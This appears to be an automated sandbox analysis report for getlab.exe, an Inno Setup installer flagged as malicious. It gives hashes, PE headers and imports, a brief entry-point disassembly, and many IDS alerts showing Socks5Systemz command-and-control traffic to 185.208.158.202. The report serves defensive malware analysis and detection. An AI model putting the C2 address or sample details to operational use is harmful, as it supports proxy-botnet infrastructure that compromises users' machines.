                                                                        MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                        SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                        SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                        SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                        Malicious:false
                                                                        Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:modified
                                                                        Size (bytes):3397185
                                                                        Entropy (8bit):6.501949315581084
                                                                        Encrypted:false
                                                                        SSDEEP:49152:jcpp64wB/nwOGSXpzopPdJTp19zxJwBv1g58fR:jSp61nRx5zopPdJTT9zxmw58fR
                                                                        MD5:9DC53D054BB2482253850DA5D8DFF405
                                                                        SHA1:F6E82BED4CA68946DC87B172D9E9AB51AB38084A
                                                                        SHA-256:07D66DC4FF91DA57222F880EFEF718EDE491777EA387EE09D3E26B2CAAB7DDB2
                                                                        SHA-512:249A4782254286B6A0D999720FB62DCCA616AC21BD5267377514940C22FB5D1F20F12FA9E00577258DDD5EF7B782D945716A1C118BB56320309C9C7A75E77441
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...i..L.........................................@..........................@4.......4..................................................U...........................................................................................................stum8.............................. ..`.stun8..l...........................@..@.stuo8...d...0...2..................@....rsrc....V.......V...B..............@..@.stup8...@......A>..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.9979305594973775
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                        • Inno Setup installer (109748/4) 1.08%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        File name:getlab.exe
                                                                        File size:3'599'599 bytes
                                                                        MD5:15bd54ed3324a464c1deb1a883e7649e
                                                                        SHA1:7a6853de5875b347fe48afb232d249e44efeb879
                                                                        SHA256:7d728e3092520965203537354ccb0798292014885aecdefe1f22a988cb67661d
                                                                        SHA512:ce9ba0c6853f6cb77f8464c6b09ecf8f0d41555025a7de720a7a2b9b822d39bccdd8798b9e40cc188bd1c943e7a347541c72258247b8a42b5a325878cc294426
                                                                        SSDEEP:49152:1vFQDY+MpR85bqkh0X/5zflc+cOqngh0Kn3aSl0OlJaHiAJ0YAVbzzqqRnSTKqNE:NFNoK/5Bkgh0K3aJOGCVdiZ/HA
                                                                        TLSH:99F53302FA9045FFE2698C75E92904124F177A6E05BEE508BA8ECE146BBEFE4D45C701
                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                        Icon Hash:2d2e3797b32b2b99
                                                                        Entrypoint:0x409c40
                                                                        Entrypoint Section:CODE
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:1
                                                                        OS Version Minor:0
                                                                        File Version Major:1
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:1
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                        Instruction
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        add esp, FFFFFFC4h
                                                                        push ebx
                                                                        push esi
                                                                        push edi
                                                                        xor eax, eax
                                                                        mov dword ptr [ebp-10h], eax
                                                                        mov dword ptr [ebp-24h], eax
                                                                        call 00007FE7748C700Bh
                                                                        call 00007FE7748C8212h
                                                                        call 00007FE7748C84A1h
                                                                        call 00007FE7748CA4D8h
                                                                        call 00007FE7748CA51Fh
                                                                        call 00007FE7748CCE4Eh
                                                                        call 00007FE7748CCFB5h
                                                                        xor eax, eax
                                                                        push ebp
                                                                        push 0040A2FCh
                                                                        push dword ptr fs:[eax]
                                                                        mov dword ptr fs:[eax], esp
                                                                        xor edx, edx
                                                                        push ebp
                                                                        push 0040A2C5h
                                                                        push dword ptr fs:[edx]
                                                                        mov dword ptr fs:[edx], esp
                                                                        mov eax, dword ptr [0040C014h]
                                                                        call 00007FE7748CDA1Bh
                                                                        call 00007FE7748CD64Eh
                                                                        lea edx, dword ptr [ebp-10h]
                                                                        xor eax, eax
                                                                        call 00007FE7748CAB08h
                                                                        mov edx, dword ptr [ebp-10h]
                                                                        mov eax, 0040CE24h
                                                                        call 00007FE7748C70B7h
                                                                        push 00000002h
                                                                        push 00000000h
                                                                        push 00000001h
                                                                        mov ecx, dword ptr [0040CE24h]
                                                                        mov dl, 01h
                                                                        mov eax, 0040738Ch
                                                                        call 00007FE7748CB397h
                                                                        mov dword ptr [0040CE28h], eax
                                                                        xor edx, edx
                                                                        push ebp
                                                                        push 0040A27Dh
                                                                        push dword ptr fs:[edx]
                                                                        mov dword ptr fs:[edx], esp
                                                                        call 00007FE7748CDA8Bh
                                                                        mov dword ptr [0040CE30h], eax
                                                                        mov eax, dword ptr [0040CE30h]
                                                                        cmp dword ptr [eax+0Ch], 01h
                                                                        jne 00007FE7748CDBCAh
                                                                        mov eax, dword ptr [0040CE30h]
                                                                        mov edx, 00000028h
                                                                        call 00007FE7748CB798h
                                                                        mov edx, dword ptr [00000030h]
                                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd000 | 0x950 | .idata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x2c00 | .rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0xf000 | 0x18 | .rdata
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                        CODE | 0x1000 | 0x9364 | 0x9400 | 2c410dfc3efd04d9b69c35c70921424e | False | 0.6147856841216216 | data | 6.560885192755103 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        DATA | 0xb000 | 0x24c | 0x400 | d5ea23d4ecf110fd2591314cbaa84278 | False | 0.310546875 | data | 2.7390956346874638 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        BSS | 0xc000 | 0xe88 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .idata | 0xd000 | 0x950 | 0xa00 | bb5485bf968b970e5ea81292af2acdba | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .tls | 0xe000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rdata | 0xf000 | 0x18 | 0x200 | 9ba824905bf9c7922b6fc87a38b74366 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .reloc | 0x10000 | 0x8b4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .rsrc | 0x11000 | 0x2c00 | 0x2c00 | 7be6483681d9a60b92b7e93f348010e6 | False | 0.32191051136363635 | data | 4.455636105188938 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                        RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
                                                                        RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
                                                                        RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
                                                                        RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
                                                                        RT_STRING | 0x12574 | 0x2f2 | data | | | 0.35543766578249336
                                                                        RT_STRING | 0x12868 | 0x30c | data | | | 0.3871794871794872
                                                                        RT_STRING | 0x12b74 | 0x2ce | data | | | 0.42618384401114207
                                                                        RT_STRING | 0x12e44 | 0x68 | data | | | 0.75
                                                                        RT_STRING | 0x12eac | 0xb4 | data | | | 0.6277777777777778
                                                                        RT_STRING | 0x12f60 | 0xae | data | | | 0.5344827586206896
                                                                        RT_RCDATA | 0x13010 | 0x2c | data | | | 1.1590909090909092
                                                                        RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
                                                                        RT_VERSION | 0x1307c | 0x4b8 | COM executable for DOS | English | United States | 0.26903973509933776
                                                                        RT_MANIFEST | 0x13534 | 0x560 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4251453488372093
                                                                        DLL | Import
                                                                        kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                        user32.dll | MessageBoxA
                                                                        oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                        advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                        kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                        user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                        comctl32.dll | InitCommonControls
                                                                        advapi32.dll | AdjustTokenPrivileges
                                                                        Language of compilation system | Country where language is spoken | Map
                                                                        Dutch | Netherlands |
                                                                        English | United States |
                                                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                        2024-11-30T02:33:53.594534+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49736 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:33:53.594534+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49736 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:33:54.179795+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49736 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:33:54.179795+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49736 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:33:58.262436+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49736 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:33:58.262436+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49736 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:33:58.849545+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49736 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:33:58.849545+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49736 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:00.572922+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49746 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:00.572922+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49746 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:02.227166+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49752 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:02.227166+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49752 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:03.917609+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49758 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:03.917609+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49758 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:04.497598+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49758 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:04.497598+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49758 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:05.066031+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49758 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:05.066031+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49758 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:06.739788+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49764 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:06.739788+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49764 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:08.320376+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49770 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:08.320376+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49770 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:09.937602+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49771 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:09.937602+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49771 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:11.556643+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49777 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:11.556643+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49777 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:13.226956+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49783 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:13.226956+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49783 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:14.944372+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49788 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:14.944372+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49788 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:16.553933+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49790 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:16.553933+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49790 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:18.166014+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49795 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:18.166014+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49795 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:19.845585+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49800 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:19.845585+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49800 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:21.511567+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49803 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:21.511567+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49803 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:22.101381+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49803 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:22.101381+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49803 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:23.884939+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49809 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:23.884939+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49809 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:25.556492+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49814 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:25.556492+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49814 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:27.189408+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49820 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:27.189408+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49820 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:28.850327+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49825 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:28.850327+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49825 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:30.470731+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49828 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:30.470731+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49828 | 185.208.158.202 | 80 | TCP
                                                                        2024-11-30T02:34:32.109688+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449833185.208.158.20280TCP
                                                                        2024-11-30T02:34:32.109688+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449833185.208.158.20280TCP
                                                                        2024-11-30T02:34:32.691157+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449833185.208.158.20280TCP
                                                                        2024-11-30T02:34:32.691157+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449833185.208.158.20280TCP
                                                                        2024-11-30T02:34:34.309929+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449839185.208.158.20280TCP
                                                                        2024-11-30T02:34:34.309929+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449839185.208.158.20280TCP
                                                                        2024-11-30T02:34:35.944753+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449844185.208.158.20280TCP
                                                                        2024-11-30T02:34:35.944753+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449844185.208.158.20280TCP
                                                                        2024-11-30T02:34:37.661938+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449849185.208.158.20280TCP
                                                                        2024-11-30T02:34:37.661938+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449849185.208.158.20280TCP
                                                                        2024-11-30T02:34:39.304888+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449853185.208.158.20280TCP
                                                                        2024-11-30T02:34:39.304888+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449853185.208.158.20280TCP
                                                                        2024-11-30T02:34:40.919549+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449858185.208.158.20280TCP
                                                                        2024-11-30T02:34:40.919549+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449858185.208.158.20280TCP
                                                                        2024-11-30T02:34:41.503613+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449858185.208.158.20280TCP
                                                                        2024-11-30T02:34:41.503613+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449858185.208.158.20280TCP
                                                                        2024-11-30T02:34:43.116466+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449864185.208.158.20280TCP
                                                                        2024-11-30T02:34:43.116466+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449864185.208.158.20280TCP
                                                                        2024-11-30T02:34:44.735837+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449869185.208.158.20280TCP
                                                                        2024-11-30T02:34:44.735837+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449869185.208.158.20280TCP
                                                                        2024-11-30T02:34:46.404795+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449873185.208.158.20280TCP
                                                                        2024-11-30T02:34:46.404795+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449873185.208.158.20280TCP
                                                                        2024-11-30T02:34:48.037210+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449878185.208.158.20280TCP
                                                                        2024-11-30T02:34:48.037210+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449878185.208.158.20280TCP
                                                                        2024-11-30T02:34:49.693432+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449883185.208.158.20280TCP
                                                                        2024-11-30T02:34:49.693432+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449883185.208.158.20280TCP
                                                                        2024-11-30T02:34:51.306229+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449888185.208.158.20280TCP
                                                                        2024-11-30T02:34:51.306229+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449888185.208.158.20280TCP
